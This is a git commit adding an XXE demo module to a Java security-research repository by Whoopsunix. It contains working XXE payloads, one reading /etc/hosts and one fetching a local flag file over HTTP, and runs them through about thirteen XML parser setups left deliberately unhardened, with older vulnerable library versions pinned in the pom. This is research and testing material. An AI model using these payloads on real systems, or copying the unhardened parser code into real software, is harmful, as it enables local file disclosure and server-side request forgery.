add XXE Demo :)

Author: Whoopsunix

MemShellAndRceEcho/JavaxTomcatDemo/pom.xml

@@ -15,10 +15,10 @@
             <artifactId>tomcat-catalina</artifactId>
             <!--            <version>7.0.59</version>-->
             <!--            <version>7.0.109</version>-->
-<!--                        <version>8.0.53</version>-->
-                        <version>8.5.82</version>
-<!--            <version>9.0.65</version>-->
-<!--            <version>10.0.23</version>-->
+            <!--                        <version>8.0.53</version>-->
+            <version>8.5.82</version>
+            <!--            <version>9.0.65</version>-->
+            <!--            <version>10.0.23</version>-->
         </dependency>
         <dependency>
             <groupId>commons-fileupload</groupId>
@@ -35,6 +35,12 @@
             <artifactId>jsp-api</artifactId>
             <version>2.2</version>
         </dependency>
+        <!-- ldap -->
+        <dependency>
+            <groupId>com.unboundid</groupId>
+            <artifactId>unboundid-ldapsdk</artifactId>
+            <version>3.1.1</version>
+        </dependency>
 
         <dependency>
             <groupId>org.apache.commons</groupId>
@@ -53,6 +59,40 @@
             <artifactId>java-object-searcher</artifactId>
             <version>0.1.0</version>
         </dependency>
+
+
+        <!--        <dependency>-->
+        <!--            <groupId>javax.servlet</groupId>-->
+        <!--            <artifactId>javax.servlet-api</artifactId>-->
+        <!--            <version>3.1.0</version>-->
+        <!--            <scope>provided</scope>-->
+        <!--        </dependency>-->
+
+        <!--        &lt;!&ndash; ldap &ndash;&gt;-->
+        <!--        <dependency>-->
+        <!--            <groupId>com.unboundid</groupId>-->
+        <!--            <artifactId>unboundid-ldapsdk</artifactId>-->
+        <!--            <version>3.1.1</version>-->
+        <!--        </dependency>-->
+
+        <!--        <dependency>-->
+        <!--            <groupId>org.apache.tomcat.embed</groupId>-->
+        <!--            <artifactId>tomcat-embed-el</artifactId>-->
+        <!--            <version>8.5.43</version>-->
+        <!--            <scope>compile</scope>-->
+        <!--        </dependency>-->
+        <!--        <dependency>-->
+        <!--            <groupId>org.apache.tomcat.embed</groupId>-->
+        <!--            <artifactId>tomcat-embed-core</artifactId>-->
+        <!--            <version>8.5.43</version>-->
+        <!--            <scope>compile</scope>-->
+        <!--        </dependency>-->
+        <!--        <dependency>-->
+        <!--            <groupId>org.apache.tomcat.embed</groupId>-->
+        <!--            <artifactId>tomcat-embed-jasper</artifactId>-->
+        <!--            <version>8.5.43</version>-->
+        <!--            <scope>compile</scope>-->
+        <!--        </dependency>-->
     </dependencies>
 
 

README.md

@@ -41,6 +41,7 @@ By. Whoopsunix
     - [XStream](#xstream)
   - [构造方法利用](#constructorexp)
 - [0x07 文件读写 Demo](#0x07-文件读写-demo)
+- [0x08 XXE 有回显测试 Demo](#0x08-xxe-有回显测试-demo)
 - [鸣谢](#Thanks)
 
 # 0x01 [RceEcho & MemShell](MemShellAndRceEcho)
@@ -255,6 +256,10 @@ JDBC 序列化的知识可以参考这些项目 [JDBC-Attack](https://github.com
 
 可用的文件读写方法，即 Java 数据流的各种操作方法
 
+# 0x08 [XXE 有回显测试 Demo](XXE)
+
+测试 JDK 原生的 XXE Demo 时最好将 pom 引入的依赖注释掉，idea 调试时容易出问题进不到想要的 hook 点 
+
 # Stats
 
 ![Alt](https://repobeats.axiom.co/api/embed/818a4d2c0d1562eec751b2637b825b3b0d2cf0e3.svg "Repobeats analytics image")

XXE/pom.xml

@@ -0,0 +1,52 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>org.example</groupId>
+    <artifactId>XXE</artifactId>
+    <version>1.0-SNAPSHOT</version>
+    <packaging>jar</packaging>
+
+    <name>XXE</name>
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <dependencies>
+        <!-- XXE -->
+        <dependency>
+            <groupId>org.jdom</groupId>
+            <artifactId>jdom</artifactId>
+            <version>1.1</version>
+        </dependency>
+        <dependency>
+            <groupId>org.jdom</groupId>
+            <artifactId>jdom2</artifactId>
+            <version>2.0.6</version>
+        </dependency>
+        <dependency>
+            <groupId>xerces</groupId>
+            <artifactId>xercesImpl</artifactId>
+            <version>2.6.2</version>
+        </dependency>
+        <dependency>
+            <groupId>dom4j</groupId>
+            <artifactId>dom4j</artifactId>
+            <version>1.6.1</version>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <configuration>
+                    <source>8</source>
+                    <target>8</target>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
+</project>

XXE/src/main/java/org/example/XXEDemo.java

@@ -0,0 +1,249 @@
+package org.example;
+
+
+import java.io.ByteArrayInputStream;
+
+/**
+ * @author Whoopsunix
+ *
+ * XXE 有回显 Demo
+ */
+public class XXEDemo {
+
+    public static void main(String[] args) throws Exception {
+        String filePayload = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/hosts\">]><foo>&xxe;</foo>";
+        String httpPayload = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:1234/flag.txt\">]><foo>&xxe;</foo>";
+        String result = null;
+
+//        result = xmlReader(httpPayload);
+//        result = jdomSAXBuilder(filePayload);
+//        result = jdom2SAXBuilder(filePayload);
+//        result = javaxSAXParser(httpPayload);
+//        result = dom4jSAXReader(filePayload);
+        result = jaxpSAXParserFactoryImpl(filePayload);
+//        result = xercesSAXParser(filePayload);
+//        result = javaxDocumentBuilder(httpPayload);
+//        result = jaxpDocumentBuilderImpl(httpPayload);
+//        result = jaxpDocumentBuilderFactoryImpl(httpPayload);
+//        result = jaxpXercesDocumentBuilderFactoryImpl(httpPayload);
+//        result = dom4jDocumentHelper(httpPayload);
+//        result = javaxXMLInputFactory(filePayload);
+
+        // test
+
+
+        System.out.println(result);
+
+    }
+
+    /**
+     * org.xml.sax.XMLReader
+     * filePayload、httpPayload
+     */
+    public static String xmlReader(String xml) throws Exception {
+        org.xml.sax.XMLReader xmlReader = org.xml.sax.helpers.XMLReaderFactory.createXMLReader();
+        // 使用 ByteArrayInputStream 将字符串转换为输入流
+        ByteArrayInputStream inputStream = new ByteArrayInputStream(xml.getBytes());
+
+        // 使用 InputSource 包装输入流
+        org.xml.sax.InputSource inputSource = new org.xml.sax.InputSource(inputStream);
+
+        // 注册事件处理程序
+        CustomHandler handler = new CustomHandler();
+        xmlReader.setContentHandler(handler);
+
+        // 解析 XML
+        xmlReader.parse(inputSource);
+
+
+        // 获取解析的结果
+        String result = handler.getResult();
+        return result;
+//        xmlReader.parse(new InputSource(new ByteArrayInputStream(xml.getBytes())));
+    }
+
+
+    /**
+     * org.jdom.input.SAXBuilder
+     * filePayload、httpPayload
+     */
+    public static String jdomSAXBuilder(String xml) throws Exception {
+        org.jdom.input.SAXBuilder saxBuilder = new org.jdom.input.SAXBuilder();
+
+        org.jdom.Document document = saxBuilder.build(new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes())));
+        // 获取根元素
+        org.jdom.Element rootElement = document.getRootElement();
+
+        // 输出结果
+        return rootElement.getText();
+    }
+
+    /**
+     * org.jdom2.input.SAXBuilder
+     * filePayload、httpPayload
+     */
+    public static String jdom2SAXBuilder(String xml) throws Exception {
+        org.jdom2.input.SAXBuilder saxBuilder = new org.jdom2.input.SAXBuilder();
+
+        org.jdom2.Document document = saxBuilder.build(new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes())));
+        // 获取根元素
+        org.jdom2.Element rootElement = document.getRootElement();
+
+        // 输出结果
+        return rootElement.getText();
+    }
+
+    /**
+     * javax.xml.parsers.SAXParser
+     * filePayload、httpPayload
+     */
+    public static String javaxSAXParser(String xml) throws Exception {
+        javax.xml.parsers.SAXParser saxParser = javax.xml.parsers.SAXParserFactory.newInstance().newSAXParser();
+        org.xml.sax.InputSource inputSource = new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes()));
+        CustomHandler handler = new CustomHandler();
+        saxParser.parse(inputSource, handler);
+        String result = handler.getResult();
+        return result;
+    }
+
+    /**
+     * javax.xml.parsers.DocumentBuilder
+     * filePayload、httpPayload
+     */
+    public static String javaxDocumentBuilder(String xml) throws Exception {
+        javax.xml.parsers.DocumentBuilder documentBuilder = javax.xml.parsers.DocumentBuilderFactory.newInstance().newDocumentBuilder();
+        org.w3c.dom.Document document = documentBuilder.parse(new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes())));
+        String result = document.getDocumentElement().getTextContent();
+        return result;
+    }
+
+    /**
+     * javax.xml.stream.XMLInputFactory
+     * filePayload、httpPayload
+     */
+    public static String javaxXMLInputFactory(String xml) throws Exception {
+        javax.xml.stream.XMLInputFactory xmlInputFactory = javax.xml.stream.XMLInputFactory.newFactory();
+        javax.xml.stream.XMLStreamReader xmlStreamReader = xmlInputFactory.createXMLStreamReader(new ByteArrayInputStream(xml.getBytes()));
+        StringBuilder result = new StringBuilder();
+
+        while (xmlStreamReader.hasNext()) {
+            int event = xmlStreamReader.next();
+
+            switch (event) {
+                case javax.xml.stream.XMLStreamConstants.START_ELEMENT:
+                    result.append("<").append(xmlStreamReader.getLocalName()).append(">");
+                    break;
+                case javax.xml.stream.XMLStreamConstants.CHARACTERS:
+                    result.append(xmlStreamReader.getText());
+                    break;
+                case javax.xml.stream.XMLStreamConstants.END_ELEMENT:
+                    result.append("</").append(xmlStreamReader.getLocalName()).append(">");
+                    break;
+                // Handle other events as needed
+            }
+        }
+
+        return result.toString();
+    }
+
+    /**
+     * org.dom4j.io.SAXReader
+     * filePayload、httpPayload
+     */
+    public static String dom4jSAXReader(String xml) throws Exception {
+        org.dom4j.io.SAXReader saxReader = new org.dom4j.io.SAXReader();
+        org.dom4j.Document document = saxReader.read(new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes())));
+        // 获取根元素
+        org.dom4j.Element rootElement = document.getRootElement();
+
+        return rootElement.getText();
+    }
+
+    /**
+     * org.dom4j.DocumentHelper 2.1.1以上被修复，且必须要有ENTITY才能利用
+     * filePayload、httpPayload
+     */
+    public static String dom4jDocumentHelper(String xml) throws Exception {
+        org.dom4j.Document document = org.dom4j.DocumentHelper.parseText(xml);
+        org.dom4j.Element rootElement = document.getRootElement();
+        String childValue = rootElement.getText();
+        return childValue;
+    }
+
+    /**
+     * org.apache.xerces.jaxp.SAXParserFactoryImpl
+     * filePayload、httpPayload
+     */
+    public static String jaxpSAXParserFactoryImpl(String xml) throws Exception {
+        org.apache.xerces.jaxp.SAXParserFactoryImpl saxParserFactory = (org.apache.xerces.jaxp.SAXParserFactoryImpl) javax.xml.parsers.SAXParserFactory.newInstance();
+        org.xml.sax.InputSource inputSource = new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes()));
+        CustomHandler handler = new CustomHandler();
+        saxParserFactory.newSAXParser().parse(inputSource, handler);
+        String result = handler.getResult();
+        return result;
+    }
+
+    /**
+     * org.apache.xerces.jaxp.DocumentBuilderImpl
+     * filePayload、httpPayload
+     */
+    public static String jaxpDocumentBuilderImpl(String xml) throws Exception {
+        org.apache.xerces.jaxp.DocumentBuilderImpl documentBuilder = (org.apache.xerces.jaxp.DocumentBuilderImpl) javax.xml.parsers.DocumentBuilderFactory.newInstance().newDocumentBuilder();
+        org.w3c.dom.Document document = documentBuilder.parse(new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes())));
+        String result = document.getDocumentElement().getTextContent();
+        return result;
+    }
+
+    /**
+     * org.apache.xerces.jaxp.DocumentBuilderFactoryImpl
+     * filePayload、httpPayload
+     */
+    public static String jaxpDocumentBuilderFactoryImpl(String xml) throws Exception {
+        org.apache.xerces.jaxp.DocumentBuilderFactoryImpl documentBuilderFactory = (org.apache.xerces.jaxp.DocumentBuilderFactoryImpl) javax.xml.parsers.DocumentBuilderFactory.newInstance();
+        org.w3c.dom.Document document = documentBuilderFactory.newDocumentBuilder().parse(new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes())));
+        String result = document.getDocumentElement().getTextContent();
+        return result;
+    }
+
+    /**
+     * com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderFactoryImpl
+     * filePayload、httpPayload
+     */
+    public static String jaxpXercesDocumentBuilderFactoryImpl(String xml) throws Exception {
+        com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderFactoryImpl documentBuilderFactory = new com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderFactoryImpl();
+        javax.xml.parsers.DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
+        org.w3c.dom.Document document = documentBuilder.parse(new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes())));
+        String result = document.getDocumentElement().getTextContent();
+        return result;
+    }
+
+    /**
+     * org.apache.xerces.parsers.SAXParser
+     * filePayload、httpPayload
+     */
+    public static String xercesSAXParser(String xml) throws Exception {
+        org.apache.xerces.parsers.SAXParser saxParser = new org.apache.xerces.parsers.SAXParser();
+        CustomHandler customHandler = new CustomHandler();
+        saxParser.setContentHandler(customHandler);
+        saxParser.parse(new org.xml.sax.InputSource(new ByteArrayInputStream(xml.getBytes())));
+
+        return customHandler.getResult();
+    }
+
+    static class CustomHandler extends org.xml.sax.helpers.DefaultHandler {
+
+        private StringBuilder resultBuilder = new StringBuilder();
+
+        @Override
+        public void characters(char[] ch, int start, int length) throws org.xml.sax.SAXException {
+            // 处理文本内容事件
+            String content = new String(ch, start, length);
+            resultBuilder.append(content);
+        }
+
+        // 获取解析的结果
+        public String getResult() {
+            return resultBuilder.toString();
+        }
+    }
+}

pom.xml

@@ -15,6 +15,7 @@
         <module>Serialization</module>
         <module>MemShellAndRceEcho</module>
         <module>FilesOperations</module>
+        <module>XXE</module>
         <module>Utils</module>
     </modules>